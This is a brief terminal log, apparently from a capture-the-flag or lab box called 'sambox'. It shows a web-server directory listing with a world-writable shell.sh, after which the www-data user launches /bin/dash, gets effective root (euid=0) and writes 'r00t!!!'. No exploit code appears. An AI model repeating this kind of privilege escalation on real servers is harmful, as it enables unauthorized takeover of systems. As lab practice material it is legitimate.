-rwxrwxrwx  1 www-data www-data    20 Aug 16 07:22 shell.sh 
drwxr-xr-x  6 www-data www-data  4096 Nov 13  2011 templates
-rw-rw-rw-  1 www-data www-data     0 Aug 16 06:36 test_1.txt
drwxr-xr-x  2 www-data www-data  4096 Aug 16 06:20 tmp
-rw-r--r--  1 www-data www-data  1811 Apr  7  2011 web.config.txt
www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ /bin/dash
/bin/dash
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

r00t!!!


